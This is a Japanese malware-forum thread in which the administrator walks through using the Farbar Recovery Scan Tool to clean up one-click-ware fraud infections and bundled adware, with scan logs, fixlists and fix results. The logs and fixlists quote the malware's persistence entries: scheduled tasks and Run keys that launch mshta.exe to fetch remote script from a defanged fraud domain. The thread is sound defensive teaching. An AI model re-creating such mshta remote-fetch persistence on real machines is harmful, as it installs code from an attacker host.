マルウェアなんでも雑談掲示板
簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 22:29:49
hiさんから「早よ、早よFRST.exeの解説サイトを開設しておくれ」と追い込みをかけられて?いるのですが、こう見えて管理人も「それなりに」忙しい人生を歩んでいるため、なかなか時間を確保できません。そこで「応急手当?」的な「なんちゃってチュートリアル」を投下しておきます。
FRST.exeの訓練用には「ワンクリウエア」が最適の教材なので、今回もワンクリウエアを使って解説を試みておきます。なお、本件チュートリアル?も「At your OWN risk」が鉄則です。ご理解ください。
先ず「デスクトップ」上に、「FRST」という空フォルダを1個作成しておいてください。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 22:33:49
次。
FRST.exe=Farbar Recovery Scan Toolを「事前に作成しておいた」空のFRSTフォルダを目指してダウンロード
http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
OSのbit数にあわせてダウンロードすること
( http://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/)
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 22:35:35
FRST.exeを「管理者権限」で起動する
2)起動後、FRST.exeのアップデート更新が行われる場合があります。その場合は、しばし待機すること。
3)FRST.exeのアップデートが完了すると「The tool is ready to use」と表示されるから、ここからすべての作業が始まる。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 22:54:01
さてと。まず
1)White listという欄を見る。基本的に「☑」が入っているが「レジストリ」に関しては、この☑を外して使えば起動中でホワイトリストに基づか「ない」レジストリが検出されるので悪性レジストリを検知しやすい。今回のワンクリウエアscanにおいてもレジストリの☑は外してscanをしている(ホワイトリストは使っていない)。
2)次に「Optional scan」の欄を見てほしい。「Addition.txt」に☑を必ず入れてほしい。これはタスクスケジューラ登録を検出したり、Firewallの設定環境の検出、インストール情報のlogなど重要な情報を得ることができる。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:01:24
scanの結果
1)FRST.txt
2)Addition.txt
2つのlogが排出されたはず
じっくりとlogを読み込むこと
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {71461418-4A67-4227-A02D-FB2F3FDC5F93} - System32\Tasks\RegWrite => mshta.exe hxxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
Task: {F6DA3F47-7D09-4E1A-9C89-BB4F86763CE5} - System32\Tasks\SystemBoot => mshta.exe hxxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605
==================== Registry (All) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [SystemBoot70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605&log=1
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\RunOnce: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
logを見れば1)タスクスケジューラが登録され2)不正なレジストリが生成されていることがわかる。これを基に、fixスクリプト(fxlist)を自作するのである。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:05:21
FRST.exeのfixスクリプト(fixlist)の作り方
FRST.exeのfixスクリプト(fixlist)作成に必要な基本的なコマンドは以下
=====================
Start
Closeprocesses:
Emptytemp:
Reboot:
CreateRestorePoint:
End
=====================
★Closeprocesses:稼働中のプロセスが強制的に終了へ。本家サイトの説明によれば【Closes all the non-essential processes. Helps to make fixing more effective and faster】だという。FRSTによるfixが最大限効果的に行われるように稼働中プロセスは可能な限り終了させたほうがfixが効果的に行われるからである。
またCloseprocesses:コマンドは必然的にPCを再起動させるので「Reboot:」コマンドは本来であれば必要がない。本家サイトによれば【When this directive is included in a fix it will automatically apply a reboot. There is no need to use the Reboot: directive】。
★Emptytemp:システム一時フォルダ、Temporary Internet Files、ごみ箱の中身などが総て削除へ(ゴミ箱の中身は事前に確認しておいたほうがよい)
本家サイトによれば
The following directories are emptied:
•Windows Temp
•Users Temp folders
•Edge, IE, FF, Chrome and Opera cache, HTML5 storages, Cookies and History (Note: FF history is not removed)
•Recently opened files cache
•Flash Player cache
•Java cache
•Steam HTML cache
•Explorer thumbnail and icon cache
•BITS transfer queue (qmgr*.dat files)
•Recycle Bin
またEmptytempコマンドもPCを再起動させる作用があるため、reboot:コマンドは必要が無くなる。
When EmptyTemp: directive is used the system will be rebooted after the fix. No need to use Reboot: directive. Also no matter if EmptyTemp: is added at the start, middle, or end of the fixlist it will be executed after all other fixlist lines are processed.
★CreateRestorePoint: システム復元ポイントを自作しておく
(http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/)
注意=FRSTにおけるfixスクリプト(fixlist)作成は「メモ帳」を使うこと。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:09:25
では実際にコマンドを使いながら「fixlist」を自作してみる
-------------------------------------------------------------
Start
CreateRestorePoint:
Closeprocesses:
Emptytemp:
Task: {71461418-4A67-4227-A02D-FB2F3FDC5F93} - System32\Tasks\RegWrite => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
Task: {F6DA3F47-7D09-4E1A-9C89-BB4F86763CE5} - System32\Tasks\SystemBoot => mshta.exe hxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [SystemBoot70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605&log=1
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\RunOnce: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
End
-----------------------------------------------------------------
以上がfixlistである。fixスクリプトが完成したら必ずスクリプト名を「fixlist」にすること(必須)。また拡張子は「txt」でなければいけない。
これを自作しておいたデスクトップ上の「FRST」フォルダに「必ず」保存すること。かつfixlistは「メモ帳」を使って自作すること。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:17:36
fixlistを自作しデスクトップ上の「FRST」フォルダに格納したら、FRST.exeのコンソール画面を見る。「Fix」ボタンがあるのでそれをクリックすればfixが開始される。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:18:51
起動中のプログラムのプロセスは基本的に終了となる(よって起動中のワンクリウエア画面のmshta.exeもプロセス停止となり不愉快な登録完了画面も消えてゆく)
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/30 (Tue) 23:26:32
Fixが完了するとPC再起動を求められるので許可をすると再起動となりFixが完了に向かう。
さて結果はどうなったか?
---------------------------------------
Fix result of Farbar Recovery Scan Tool (x86) Version: 29-08-2016
Ran by Windows Script Scammer (30-08-2016 22:12:06) Run:18
Running from C:\Users\Windows Script Scammer\Desktop\FRST
Loaded Profiles: Scammer (Available Profiles: Spammer & Scammer)
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CreateRestorePoint:
Closeprocesses:
Emptytemp:
Task: {71461418-4A67-4227-A02D-FB2F3FDC5F93} - System32\Tasks\RegWrite => mshta.exe hxxp://eroxxxdoga.com set_inf2.php?cccid=70557c47b24b1605
Task: {F6DA3F47-7D09-4E1A-9C89-BB4F86763CE5} - System32\Tasks\SystemBoot => mshta.exe hxxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [SystemBoot70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/reg2.php?cccid=70557c47b24b1605&log=1
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\Run: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
HKU\S-1-5-21-114335241-451106317-3397992227-1000\...\RunOnce: [RegWrite70557c47b24b1605] => mshta.exe hxp://eroxxxdoga.com/set_inf2.php?cccid=70557c47b24b1605
End
*****************
Restore point was successfully created.
Processes closed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{71461418-4A67-4227-A02D-FB2F3FDC5F93}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{71461418-4A67-4227-A02D-FB2F3FDC5F93}" => key removed successfully.
C:\Windows\System32\Tasks\RegWrite => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegWrite" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F6DA3F47-7D09-4E1A-9C89-BB4F86763CE5}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6DA3F47-7D09-4E1A-9C89-BB4F86763CE5}" => key removed successfully.
C:\Windows\System32\Tasks\SystemBoot => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot" => key removed successfully.
HKU\S-1-5-21-114335241-451106317-3397992227-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SystemBoot70557c47b24b1605 => value removed successfully.
HKU\S-1-5-21-114335241-451106317-3397992227-1000\Software\Microsoft\Windows\CurrentVersion\Run\\RegWrite70557c47b24b1605 => value removed successfully.
HKU\S-1-5-21-114335241-451106317-3397992227-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\RegWrite70557c47b24b1605 => value removed successfully.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11741071 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 5680 B
Edge => 0 B
Chrome => 0 B
Firefox => 6725702 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 82724 B
LocalService => 0 B
NetworkService => 4100 B
Spammer => 24564718 B
Scammer => 0 B
RecycleBin => 0 B
EmptyTemp: => 49.1 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 22:13:08 ====
(丁寧に感染が取り除かれていることが分かるはず)
基本的な「なんちゃって」チュートリアルは以上です(とりあえずネ)
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:17:15
さてと。世の中にはワンクリウエアを駆除するというソフトウエアが配布されている。
http://www.vector.co.jp/soft/winnt/util/se485314.html
しかしuserが希望していないであろうJwordなどPUP類が同梱されている厄介なremoverでもある(標準インストールとカスタムインストールの違いもあるけれど)。そこで本件ソフトウエアをインストールした場合、FRST.exeで後始末をする(PUP類感染の応用編チュートリアルのつもり)。
--------------------------------------------
CCleanerでインストール情報を出力すると
JWord プラグイン JWord Inc. 2016/08/30 2.57 MB 2.7.4.72
The Desktop Weather 2.0 Baidu Japan Inc. 2016/03/03 7.63 MB 2.0.0.10998
Yahoo!ツールバー Yahoo! JAPAN. 2016/08/30 3.96 MB 8.0.0.3
ワンクリックウェア駆除ツール Version 2.3.7.4 ソフト工房「空の牙」 2016/08/30 1.27 MB 2.3.7.4
がインストールされていることが分かる。
---------------------------------------------
さらに「IE」絡みで以下
有効 Extension JWord プラグイン C:\ProgramData\JWord\plugin2\JwdHelpAbout.html
有効 Extension JWord プラグインの設定... JWord Inc. C:\Program Files\JWord\Plugin2\JwdPH.dll
有効 Extension JWord 検索バー JWord C:\Program Files\JWord\Plugin2\Components\JwdExpBar\JwdExpBar.dll
有効 Helper JWord スピードダイアル ヘルパー JWord Inc. C:\Program Files\JWord\Common\SpeedDial\SpeedDial.dll
有効 Helper JWord プラグイン 拡張ヘルパー JWord Inc. C:\Program Files\JWord\Plugin2\jwdpm.dll
有効 Helper JWord 検索バーヘルパー JWord C:\Program Files\JWord\Plugin2\Components\JwdExpBar\JwdExpBar.dll
有効 Helper Yahoo!ツールバーフィッシング警告 Yahoo Japan Corporation. C:\Program Files\Yahoo!J\Toolbar\8_0_0_3\Modules\ypho.dll
有効 Helper Yahoo!ツールバーヘルパー Yahoo! JAPAN C:\Program Files\Yahoo!J\Toolbar\8_0_0_3\Modules\YahooToolBar.dll
有効 Toolbar Yahoo!ツールバー Yahoo! JAPAN C:\Program Files\Yahoo!J\Toolbar\8_0_0_3\Modules\YahooToolBar.dll
-----------------------------------------
有効 HKLM:Run jwdsrch JWord Inc. "C:\Program Files\JWord\Plugin2\jwdsrch.exe"
-----------------------------------------
生成されているフォルダ(ファイル)を見れば
"C:\Program Files\baidu"
"C:\Program Files\FOS Software"
"C:\Program Files\JWord"
"C:\Program Files\WeatherTool"
"C:\Program Files\Yahoo!J"
"C:\ProgramData\baidu"
"C:\ProgramData\JWord"
"C:\Users\wsp\AppData\Roaming\Baidu"
"C:\Users\wsp\AppData\Roaming\WeatherTool"
"C:\Users\wsp\AppData\LocalLow\JWord"
"C:\Users\wsp\AppData\LocalLow\Yahoo!J"
"C:\Users\wsp\AppData\Local\JWord"
------------------
ワンクリックウェア駆除ツールの場合も「自前」のアンインストーラーを実装しているので、まずコンパネからアンインストールすること(必須)。アンインストール後はPCを一旦再起動させること。
2)しかし「取りこぼし」がある。実に厄介であるが「Jword」がコンテキストメニューに残存したままである点と、検索エンジンもフックされておりJword検索が同じく残存しているのである。ここでFRST.exeを使う。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:23:42
FRST.exeでscanした結果は
--------------------------------------------
SearchScopes: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> {F4549978-C71D-4BD2-B2C0-13BAE4630A4F} URL = hxxp://search.jword.jp/cns.dll?type=jwd&fm=10&agent=&bypass=2&partner=AP&lang=utf8&name={searchTerms}
Toolbar: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> Yahoo!ツールバー - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No File
---------------------------------------------
上記scan結果を踏まえfixスクリプト(fixlist)を自作すると
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:25:25
Start
CreateRestorePoint:
Closeprocesses:
Emptytemp:
SearchScopes: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> {F4549978-C71D-4BD2-B2C0-13BAE4630A4F} URL = hxxp://search.jword.jp/cns.dll?type=jwd&fm=10&agent=&bypass=2&partner=AP&lang=utf8&name={searchTerms}
Toolbar: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> Yahoo!ツールバー - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No File
2016-08-30 21:08 - 2016-08-30 21:08 - 00000000 ____D C:\Users\wsp\AppData\LocalLow\JWord
2016-08-30 18:11 - 2016-08-31 02:43 - 00000000 ____D C:\Users\wsp\AppData\LocalLow\Yahoo!J
2016-08-30 18:11 - 2016-08-30 18:11 - 00000000 ____D C:\Users\wsp\AppData\Roaming\Baidu
2016-08-30 18:11 - 2016-08-30 18:11 - 00000000 ____D C:\ProgramData\baidu
2016-08-30 17:59 - 2016-08-30 17:59 - 00000000 ____D C:\Users\Public\Documents\Baidu
End
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:29:28
Fixした結果は以下
★
Fix result of Farbar Recovery Scan Tool (x86) Version: 29-08-2016
Ran by WSP (31-08-2016 03:39:36) Run:19
Running from C:\Users\WSP\Desktop\FRST
Loaded Profiles: wsp (Available Profiles: WSP & Scammer)
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CreateRestorePoint:
Closeprocesses:
Emptytemp:
SearchScopes: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> {F4549978-C71D-4BD2-B2C0-13BAE4630A4F}
URL = hxxp://search.jword.jp/cns.dll?type=jwd&fm=10&agent=&bypass=2&partner=AP&lang=utf8&name=
{searchTerms}
Toolbar: HKU\S-1-5-21-114335241-451106317-3397992227-1000 -> Yahoo!ツールバー - {AEF44653-C059-42CB-A5B7
-41C640DA4A67} - No File
2016-08-30 21:08 - 2016-08-30 21:08 - 00000000 ____D C:\Users\wsp\AppData\LocalLow\JWord
2016-08-30 18:11 - 2016-08-31 02:43 - 00000000 ____D C:\Users\wsp\AppData\LocalLow\Yahoo!J
2016-08-30 18:11 - 2016-08-30 18:11 - 00000000 ____D C:\Users\wsp\AppData\Roaming\Baidu
2016-08-30 18:11 - 2016-08-30 18:11 - 00000000 ____D C:\ProgramData\baidu
2016-08-30 17:59 - 2016-08-30 17:59 - 00000000 ____D C:\Users\Public\Documents\Baidu
End
*****************
Restore point was successfully created.
Processes closed successfully.
"HKU\S-1-5-21-114335241-451106317-3397992227-1000\SOFTWARE\Microsoft\Internet
Explorer\SearchScopes\{F4549978-C71D-4BD2-B2C0-13BAE4630A4F}" => key removed successfully.
HKCR\CLSID\{F4549978-C71D-4BD2-B2C0-13BAE4630A4F} => key not found.
HKU\S-1-5-21-114335241-451106317-3397992227-1000\Software\Microsoft\Internet
Explorer\Toolbar\WebBrowser\\{AEF44653-C059-42CB-A5B7-41C640DA4A67} => value removed successfully.
"HKCR\CLSID\{AEF44653-C059-42CB-A5B7-41C640DA4A67}" => key removed successfully.
C:\Users\wsp\AppData\LocalLow\JWord => moved successfully
C:\Users\wsp\AppData\LocalLow\Yahoo!J => moved successfully
C:\Users\wsp\AppData\Roaming\Baidu => moved successfully
C:\ProgramData\baidu => moved successfully
C:\Users\Public\Documents\Baidu => moved successfully
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7552162 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 56966 B
Edge => 0 B
Chrome => 0 B
Firefox => 27900768 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 82724 B
LocalService => 0 B
NetworkService => 4930 B
wsp => 12720453 B
scammer => 0 B
RecycleBin => 1480 B
EmptyTemp: => 54.1 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 03:41:04 ====
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:37:49
狙われているとは言え、ブラウザとしてのIEはやはり弱いなと感じる場合が多い。
本件もFRST.exeでIEに食い込んだJwordの排除を行うと「規定検索プロバイダの設定が破損している」という警告が発せられる。しかし心配することはない。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:49:15
ところでマイクロソフト謹製とやらの「レジストリエディタ」。一言でいえば「よくない」。使い勝手がよくないのだ。そこでサードパーティー製のレジストリエディタを使う。
http://www.gigafree.net/system/regedit/RegistryFinder.html
Registry Finder
非常に優秀だと感じる
PUP類が残していった「レジストリの残骸」を根こそぎ除去したいと願う場合は、この Registry Finderがお勧めだ。すばらしい検索能力を実装している。ただしレジストリを根こそぎ除去する場合は「システム復元ポイント」を自作すること。かつレジストリの「エクスポート」も行うとよい。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 04:52:15
個別のレジストリのlogの真上で右クリックすると「Modify」があるからそれを選択すると
「バイナリ値」を「お手軽+容易に」確認したりすることができるほど、よくできたレジストリエディタである。
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/08/31 (Wed) 16:38:50
FRST.exeは、次のような使い方もできる。分かりやすく「ワンクリウエア」を使って紹介する。
★CMD:
一例
CMD:taskkill /f /t /im mshta.exe
CMD:schtasks /Delete /tn RegWrite /f
CMD:schtasks /Delete /tn SystemBoot /f
CMD:reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v SystemBoot51357b0da73f3659
CMD:reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v RegWrite51357b0da73f3659
CMD:reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v RegWrite51357b0da73f3659
------------------------------------------
↑
メモ帳を開き、上記「構文」を書き込み「fixlist」とする
(もちろん復元ポイントを自作するコマンドを別途記載しても良いし、再起動を促すコマンドを併用しても良い。本件は、あくまで「CMD:」コマンドに関する説明だけ)
------------------------------------------
さて結果は?
*****************
========= taskkill /f /t /im mshta.exe =========
成功: PID 5392 のプロセス (PID 3744 の子プロセス) を終了しました。
========= End of CMD: =========
========= schtasks /Delete /tn RegWrite /f =========
成功: スケジュール タスク "RegWrite" は正しく削除されました。
========= End of CMD: =========
========= schtasks /Delete /tn SystemBoot /f =========
成功: スケジュール タスク "SystemBoot" は正しく削除されました。
========= End of CMD: =========
========= reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v SystemBoot51357b0da73f3659 =========
この操作を正しく終了しました。
========= End of CMD: =========
========= reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v RegWrite51357b0da73f3659 =========
この操作を正しく終了しました。
========= End of CMD: =========
========= reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v RegWrite51357b0da73f3659 =========
この操作を正しく終了しました。
========= End of CMD: =========
==== End of Fixlog 16:27:23 ====
Re: 簡単にFRST.exeのチュートリアルを - 1984
2016/09/13 (Tue) 14:11:05
FRST.exeのチュートリアルは、適当な自分のと違って力作ですので上げさせていただきます。ご紹介されたので使い始めた Registry Finder の検索はとても使いやすいです。
たまに知恵袋でも回答されるワンクリックウェア駆除ツールの方は、ご説明の通りのものですが、実体の ocwRmv2.exe は無害で起動後は、アップデートチェックで接続される他は不審な振る舞いも無いようですので VMware でセットアップして、取り出して単体で取ってあります。(誤検知は別としてスタンドアローンで問題なく動きます)。終了は×で閉じましょう。
セットアップ方法はネットセキュリティブログ様ですね。
http://www.japan-secure.com/entry/how_to_use_one-click_ware_removal_tool.html
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2016/09/13 (Tue) 15:05:17
ありがとうございます
ご指摘の【実体の ocwRmv2.exe は無害】 ←これはその通りですよね。ですから「本体」だけを配布し、あとは「開発資金の寄付をお願いします」で良かったんです。余計なPUPを同梱するから批判もされているわけで。とくにJwordのIEの検索エンジンの改竄は一般userでは、まず削除できないと見ています。せめてJwordだけでも外せば良いのにとさえ思います。
❷ところでFRSTを使わなくてもRegistry Finderで丁寧にレジストリを除去してゆけば、厄介なJword感染も解決できますよね。Registry Finderの検索能力には「深み」があり、マイクロソフト謹製の「レジストリエディタ」を遥かに凌ぐ検索能力を誇ります。沢山のuserさんに認知していただきたいソフトウエアの一つです。
Re: 簡単にFRST.exeのチュートリアルを - 1984
2016/09/13 (Tue) 15:39:02
作者さんはまるで、「これだから感染したんだよ」と見本を見せてくれているようですね (笑)
Re: 簡単にFRST.exeのチュートリアルを - 管理人です
2017/02/12 (Sun) 13:44:34
1984さん、お元気なんでしょうか?最近、お姿がさっぱり見えませんね。
*
http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
FRST.exe
logの見方
-------------------------------
2013-03-20 22:55 - 2013-03-20 22:55 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2010-10-12 01:06 - 2008-11-07 18:18 - 0000406 _____ c:\Windows\Tasks\At12.job
2010-10-12 01:06 - 2008-11-07 18:17 - 0001448 ____S c:\Windows\System32\Drivers\bwmpm.sys
FRST adds notations to certain log entries:
C - Compressed
D - Directory
H - Hidden
L - Symbolic Link
N - Normal (does not have other attributes set)
O - Offline
R - Readonly
S - System
T - Temporary
X - No scrub (Windows 8+)